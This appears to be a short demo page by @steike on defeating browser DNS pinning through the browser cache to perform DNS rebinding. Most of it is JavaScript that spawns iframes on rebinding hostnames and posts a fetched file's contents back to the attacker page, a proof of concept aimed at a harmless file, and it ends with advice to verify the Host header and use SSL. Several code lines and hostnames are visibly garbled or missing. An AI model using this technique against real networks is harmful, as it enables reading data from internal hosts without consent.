/ @steike

Browser cache + DNS rebinding

Alok's DNS rebinding via browser cache

Browsers protect against DNS rebinding by caching DNS entries for the entire browser session. even if the time-to-live sent by the server is short.

This demo attempts to steal a (harmless) HTML file from

You need to visit this page twice; try closing your browser and opening it again.


// This is the script that will run inside each frame. It justs fetches a file from its own host and posts the result back.

function framescript() {
  var x = new XMLHttpRequest();'GET', '/js/blank.html?:CC=max-age=0&raw=try_again');
  x.onload = function() { parent.postMessage(x.responseText, '*'); };

window.onmessage = function(e) {
  // If we hit ourselves, the result is not interesting; ignore it.
  if (/try_again/.test( return;
  document.getElementById('rightbox').textContent =;

// Now create a bunch of frames. The host name will resolve to
// 50% of the time and this server the rest of the time.
// If it hits this server, it will serve the script above with a long
// cache lifetime.

for (var i=0; i<20; i++) {
  var f = document.createElement('iframe');
  f.setAttribute('style', 'width:10px; height:10px; border:none');
  f.src = 'http://4s.'+i+'' + 
          '/js/blank.html?:CC=max-age=86400&body[bgcolor=tan]&js=' + encodeURIComponent('!'+framescript+'()');

(This uses the DNS thing and chargen to save some work)


Everything should verify the Host header. Everything. Also, SSL everywhere.

Complaints to @steike.